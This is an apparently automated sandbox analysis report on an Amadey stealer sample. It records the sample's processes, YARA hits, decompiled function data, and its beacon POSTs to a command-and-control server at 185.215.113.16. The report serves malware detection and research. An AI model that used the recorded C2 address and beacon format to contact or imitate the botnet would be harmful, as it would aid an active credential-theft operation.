51	192.168.2.4	49788	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:54:02.388056993 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:54:03.154484987 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:54:03.156116009 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:54:03.389786959 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49789	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:54:03.502321959 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:54:04.277812004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49790	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:54:04.304600000 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:54:05.047624111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49791	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:54:05.865866899 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:54:06.519933939 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 05:54:06.523760080 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:54:06.746560097 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49792	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:54:06.859533072 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 05:54:07.572273016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49793	185.215.113.16	80	8136	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 05:54:07.581801891 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 42 46 45 41 35 34 30 43 38 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CBFEA540C8FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 05:54:08.339982033 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 03:54:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	23:52:02
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xee0000
File size:	1'930'240 bytes
MD5 hash:	8367D2F6EF5E11DB59EC8E4295378853
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1789336542.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1743323131.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	23:52:05
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xf20000
File size:	1'930'240 bytes
MD5 hash:	8367D2F6EF5E11DB59EC8E4295378853
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1818290086.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1776904295.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:52:05
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xf20000
File size:	1'930'240 bytes
MD5 hash:	8367D2F6EF5E11DB59EC8E4295378853
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1818369517.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1777396325.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	23:53:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xf20000
File size:	1'930'240 bytes
MD5 hash:	8367D2F6EF5E11DB59EC8E4295378853
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2324424326.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 04CE0CCA Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6321375f35c66df6f5851b7a8fda9246b3a1d9a694868a9361c63aa8d24ab78e
Instruction ID: d3311e133f61c7033c81d1c39e36ac5eb4ffdd7cafb6b70c3f140ca407894346
Opcode Fuzzy Hash: 6321375f35c66df6f5851b7a8fda9246b3a1d9a694868a9361c63aa8d24ab78e
Instruction Fuzzy Hash: 4AE06DA724E135ED1181514327166B92B1BB1C633033C9827F04BD5582F7C8FB8973B6

Function 04CE0C57 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36cd0cc9f59b8f998715af05fc561255a360ec0510813bda7842adae396de51c
Instruction ID: 6d7fb35c51ef4f62601e4f5f6e4cfa5403e65a814f6c3f584c2b80f5591d8e3f
Opcode Fuzzy Hash: 36cd0cc9f59b8f998715af05fc561255a360ec0510813bda7842adae396de51c
Instruction Fuzzy Hash: 3401D4A734E230FE610196436785AB66B6FE1C63303388826F407C5641F3D8FB4576B2

Function 04CE0C66 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf5f12c19f261f3fd4fb20b0f8a83cf855f6d36a93332cdca3d5d1a122f25baa
Instruction ID: f13867cc748e8c85562dbb003aa8ee805b20b17d9bfd381e0c2739b7b913168a
Opcode Fuzzy Hash: cf5f12c19f261f3fd4fb20b0f8a83cf855f6d36a93332cdca3d5d1a122f25baa
Instruction Fuzzy Hash: 8C01B1A724E230EE600186435755AB6676FE1C63303388826F407C6541E3D8BB4936B2

Function 04CE0C76 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d72dd43073c9565642dac70baea5e421c34f493f69844538262daf07271d737
Instruction ID: d55361469511893aa5cc35e01f0d9fbde5566dd7343fb09ddeb4cc6f81469a49
Opcode Fuzzy Hash: 7d72dd43073c9565642dac70baea5e421c34f493f69844538262daf07271d737
Instruction Fuzzy Hash: 7E01D4A7209230FD6102865397449B6772FE6C63303388826F447C6542E7D4BB4576B2

Function 04CE0C90 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e03297d2aabf614b5c57001f334c05f2c70f377c0e9cdacac75828fa745b533f
Instruction ID: 42403b38be6bf58de07688287b817e7ec5d9bc7e65e4ccc3b581ad90998831e1
Opcode Fuzzy Hash: e03297d2aabf614b5c57001f334c05f2c70f377c0e9cdacac75828fa745b533f
Instruction Fuzzy Hash: 940176F620E130FE510092439A006FA672FE7C53303288816F047D6682E3E8FB8676B2

Function 04CE0CAE Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568135eda80d570d4cc17d7656f254bafba77b237e552d6c8eec828b010956c8
Instruction ID: 59cf1b5d1bd5e211815850d66d90e97d6522b3c96fbb928d0f9177c77540f852
Opcode Fuzzy Hash: 568135eda80d570d4cc17d7656f254bafba77b237e552d6c8eec828b010956c8
Instruction Fuzzy Hash: 4CF0F0A724E234ED5141525327566FA6B2FA1C63303389827F007D6582F3D8FB8972B2

Function 04CE0CD4 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f9feae74b90a6cb1de0464054ec79edb497a882d092a4bc781bd3cefd56183
Instruction ID: 16bc529935ba6ff43425ff284eaa70075c0f91557a2b62a503a7b183bfcf72d2
Opcode Fuzzy Hash: 99f9feae74b90a6cb1de0464054ec79edb497a882d092a4bc781bd3cefd56183
Instruction Fuzzy Hash: B3F024A220D170EE814201031A695F92B2BB1D223133C845BF087C8182E7C8BB4A73F3

Function 04CE0CF6 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bfca5b1cb0d462b36d559d1d987afb709c33a4e3daf5b95de7784e755032306
Instruction ID: ac7a7deb09d2bcbadfacdf28fad5106757babe862b830e8f3d1ca34ab968b3d5
Opcode Fuzzy Hash: 1bfca5b1cb0d462b36d559d1d987afb709c33a4e3daf5b95de7784e755032306
Instruction Fuzzy Hash: ABE0EDAA24C030FD10029053665AABA2E2FE1C26303389416B04384582F7C5FB8522F1

Function 04CE0CE9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1791199971.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4ce0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f497190aef7c37abc9cd757cf1a661dd4ed4ddda776d41edb5eedd9c464ad24
Instruction ID: de650ef044c5014085959646042f4808f60f6d6962796957d2868e29a20aadcc
Opcode Fuzzy Hash: 3f497190aef7c37abc9cd757cf1a661dd4ed4ddda776d41edb5eedd9c464ad24
Instruction Fuzzy Hash: 3FE04FA724D035ED5042514326566B56B2FB1C623033C9416F047D8682F7C8F74933F6

Analysis Process: axplong.exePID: 8136, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6%
Total number of Nodes:	602
Total number of Limit Nodes:	42

Executed Functions

Function 00F2BD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00F78D70,00000000,00000000,00000000,00000000), ref: 00F2BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F2BE11
HttpSendRequestA.WININET(?,00000000), ref: 00F2BF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 00F2BFCC
InternetReadFile.WININET(?,?,000003FF,?,?,?,?,?), ref: 00F2C081
InternetCloseHandle.WININET(?), ref: 00F2C0A7
InternetCloseHandle.WININET(?), ref: 00F2C0AF
InternetCloseHandle.WININET(?), ref: 00F2C0B7

Strings

stoi argument out of range, xrefs: 00F2E3FA
8KG0fymoFx==, xrefs: 00F2C2EB, 00F2C543
8KG0fCKZFzY=, xrefs: 00F2C385
RHYTYv==, xrefs: 00F2BE33
RpKt, xrefs: 00F2D516
invalid stoi argument, xrefs: 00F2E404

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileRead$ConnectHttpOpenRequestSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
API String ID: 471287134-332458646
Opcode ID: 60190b7e07fec772cde59e99ed5b36d82599ca1978fe12c8b202df9133249658
Instruction ID: e99674daae2b6f3c8babc3e0a3c5f4dd6dfc26be77dbdf08241d8bc79c4bb781
Opcode Fuzzy Hash: 60190b7e07fec772cde59e99ed5b36d82599ca1978fe12c8b202df9133249658
Instruction Fuzzy Hash: 11B104B1A00128DBEB24CF28DC85BEEBB79EF45314F5041A9F908972C1DB749AC0DB95

Function 00F346C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00F37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00F3795C
Part of subcall function 00F37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00F37968
Part of subcall function 00F37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00F37971

Part of subcall function 00F2BD60: InternetOpenW.WININET(00F78D70,00000000,00000000,00000000,00000000), ref: 00F2BDED
Part of subcall function 00F2BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F2BE11

std::_Xinvalid_argument.LIBCPMT ref: 00F34EA2

Strings

stoi argument out of range, xrefs: 00F34269, 00F34EAC
mP=, xrefs: 00F36383, 00F36652
MJB+, xrefs: 00F34776, 00F347ED, 00F34A95, 00F34B0C
MJF+, xrefs: 00F347BD, 00F348EC, 00F34ADC, 00F34C0B
8ZF6, xrefs: 00F35502
WJP6, xrefs: 00F353A3
aZT6, xrefs: 00F353CC
9526, xrefs: 00F3531D
6F9fr==, xrefs: 00F34712
246122658369, xrefs: 00F34F3A, 00F34F4D, 00F34F8F, 00F34F99, 00F354F4
KFT0PL==, xrefs: 00F354B9
Vp 6, xrefs: 00F35447
9KN6, xrefs: 00F35351
Fz==, xrefs: 00F3369E, 00F34D2D
aqB6, xrefs: 00F354DB
V0x6, xrefs: 00F3541E
V0N6, xrefs: 00F3537A
96B6, xrefs: 00F35470
fed3aa, xrefs: 00F35489
5F6, xrefs: 00F35497
JB6, xrefs: 00F353F5

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectMtx_destroy_in_situOpenXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
API String ID: 2549319220-1662704651
Opcode ID: 88cc794363a4b35efe7c3bb2759a309c0977f3be87e8ded901d96415304f91f5
Instruction ID: de7453bde7d2cb847389f8760097d92ab83447b022f8be2f241b9636576c72f5
Opcode Fuzzy Hash: 88cc794363a4b35efe7c3bb2759a309c0977f3be87e8ded901d96415304f91f5
Instruction Fuzzy Hash: 43233671E002589BEF19DB28CD8979DBB729F81324F5481D8E008AB2D6DB399F84DF51

Function 00F25DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000419, xrefs: 00F25FA8
00000422, xrefs: 00F25FD9
00000423, xrefs: 00F2600A
0000043f, xrefs: 00F2603B
Keyboard Layout\Preload, xrefs: 00F25F64

Memory Dump Source

Source File: 00000006.00000002.2984501633.0000000000F21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F20000, based on PE: true

Associated: 00000006.00000002.2984471607.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984501633.0000000000F82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984671349.0000000000F89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000000F8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001117000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.00000000011FC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001228000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2984732501.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985501443.0000000001241000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985814543.00000000013E5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2985839763.00000000013E7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 1185cfafaa40104b7aaa1b7d67607b4ea142b12b21663fe9a2d6e5a4e61f50cd
